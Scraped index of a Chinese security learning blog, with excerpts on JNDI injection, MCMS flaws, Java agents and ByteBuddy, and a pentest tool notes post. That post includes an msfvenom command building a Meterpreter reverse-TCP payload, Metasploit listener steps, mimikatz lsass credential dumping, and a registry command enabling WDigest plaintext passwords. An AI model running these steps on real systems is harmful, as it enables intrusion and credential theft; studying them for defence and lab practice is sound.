之前一直不理解这个jndi到底是啥,一堆java的协议看得很糊涂不知啥用,今天仔细来看看结合工具利用jndi注入
MCMS vulnerabilities
An open source CMS Project,https://github.com/ming-soft/MCMS
the MCMS vulnerabilities include
- Reflect XSS
- Unauthorized file upload
- Authorized file delete
go正则的坑
linux使用rdp远程连接windows
渗透测试工具整理
metaspolit
默认使用msfconsole
进入这个交互式命令行工具,
然后主要是有几种模式
直接利用payload
1
2
3
4
5
6
7
8
9
10# 搜索漏洞payload
msf6 > search [key_word]
# 选中payload
msf6 > use [上一步搜出来的payload name]
# 设置payload参数,key忽略大小写
msf6 > set key value
# 显示payload参数
msf6 > options
# 运行payload
msf6 > run注意这个依旧是msfconsole模式就是交互式命令行模式
利用指定的payload监听
1
2
3
4
5
6msf6 > use exploit/multi/handler # 加载模块
msf6 > set [payload_name] # 设置名字
msf6 > set [options_key] [options_value] # 设置该payload的options键值
# 开始监听
msf6 > run
上面两个如果run完成了之后执行shell
命令就进入了meterperter即已经进入了系统内部shell环境,所以个人理解这个meterperter是准备持久化
使用msf生成后门
这是另一个模块msfvenom的内容
example:
- 生成二进制文件
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.100.103 LPORT=4444 -f raw > beacon.bin
- 生成其他类型只需要改-f的属性就行
wpscan
此工具主要用来扫描worldpress这个博客框架,这个应该更加靠近web渗透那一侧,就先放在这里做工具整理
world press scan
它使用R的包管理构建,或者使用docker,kali自带。
我的系统是ubuntu所以采用了前者构建,详见之前打这个靶场的时候记录
参数和用法很简单
1 | #使用默认配置扫网站 |
cewl
这是一个字典生成器-h
可以看到所有的选项
记录下常用选项
1 | #默认方法直接吧生成的字典 |
mimikatz
这个工具是我新接触的,记录一下使用的姿势
主要就是一个后渗透的工具,针对拿到了shell但是没有更高的权限时
针对windows系统
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统!
注:但是在安装了KB2871997补丁或者系统版本大于windows server 2012时,系统的内存中就不再保存明文的密码,这样利用mimikatz就不能从内存中读出明文密码了。mimikatz的使用需要administrator用户执行,administrators中的其他用户都不行。
使用powershell获取密码
1 | #读取密码明文(需要管理员权限) |
1 | #读取密码hash值(需要管理员权限) |
本地执行
下载mimikatz程序,找到自己系统对应的位数,右键以管理员身份运行:
1 | #提升权限 |
当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。
cmd修改注册表命令:
1 | Copyreg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f |
SAM表获取hash
1 | #导出SAM数据 |
还有和很多姿势,因为对windows很多安全机制不了解(比如域控中的成员hash,哈系传递攻击,票据传递攻击包括这个工具本身的免杀)先挖个坑,之后补全
参考
java插桩(javaagent)
昨天整了半天没有整出来的那个结果最后是一个包名引用错了..
在MANIFEST.MF中使用的包名和我自己的包名没有对上…
首先搬运这个师傅关于java Instrument的原理
javaagent
在maven项目里面修改pom.xml文件然后添加入build的选项
1 | <packaging>jar</packaging> |
加入packing和build标签,
首先做一个MyAgent类,导入了java.lang.instrument.Instrumentation
的接口
这是一个Java1.6加进来的接口,作用就是你通过jvmti代理引用程序来jvm的访问(主要用于类的动态改变和操作),这里只是将其用于一个在main函数执行之前的劫持并加载我们自己的类。
1 | //src/main/java/com/javaagent/MyAgent.java |
上面这个premain方法就是Instrmentation中提供的一个方法,可以在main运行前先运行premain函数里面的内容。
接下来定义新一个新的类用来执行main函数
1 | //src/test/java/MyAgentTest.java |
编辑一下MANIFEST.MF文件
在这个函数中需要定义好一个Premain-Class选项,这个用于定位刚刚写的MyAgent那个包含了Premain函数的类(就是包中类的位置),配置项填错就没法运行。
然后使用maven build这个package
最后配置vm options来添加一个javaagent在启动时添加参数
-javaagent:这里是之前package打包出来的jar包路径.jar=1
后面的参数1是premain函数接收的参数args。
最后运行这个MyAgentTest.java
使用ByteBuddy构建一个java Agent
只需要加依赖然后修改一下就好,添加两个依赖,和之前文章一样先导入ByteBuddy
1 | <dependency> |
重写premain
方法
官方教程给的使用ByteBuddy创建一个java Agent的方法
创建 Java Agents
1 | class ToStringAgent { |
然后根据这个形式去写
1 | package com.javaagent; |
实现委托
1 | package com.javaagent; |
MyAgentTest
进行调用
1 | package com.javaagent; |
同样先build然后在进行运行
参考
http://www.jinyunlong.xyz/articles/2021/05/15/1621089190040.html
https://www.cnblogs.com/tr1ple/p/12709402.html
java ByteBuddy
折腾了好久的javaagent不知为何就是不能在load类的时候进行其他类的执行,先放一放,了解一下ByteBuddy的使用
Byte Buddy 是一个代码生成和操作库,用于在Java应用程序运行时创建和修改Java类,而无需编译器的帮助。除了Java类库附带的代码生成实用程序外,Byte Buddy还允许创建任意类,并且不限于实现用于创建运行时代理的接口。此外,Byte Buddy提供了一种方便的API,可以使用Java代理或在构建过程中手动更改类。
比起javassist,asm,bcel起来都比较简单
个人理解就是为了解决Java静态语言的不方便之处,通过直接生成字节码然后使用JVM运行,和反射机制有点像,但是比反射机制效率更高,因为是生成字节码直接跑java虚拟机。
vulnhub-DC-2
接着打靶场熟悉工具和渗透思路
shellcode Loader免杀
测试了一下几款找到的免杀工具
frp的token does note match问题
问题
今天新拉了一个frp的版本装在腾讯云的小鸡上,然后测试了一下发现咋配置都不能使token两边匹配
疯狂给我报这个错误
register control error: token in login doesn’t match token from configuration
login to server failed: token in login doesn’t match token from configuration token in login doesn’t match token from configuration
然后我懵了,百思的不得其解,盯着token看了好几遍完全一样啊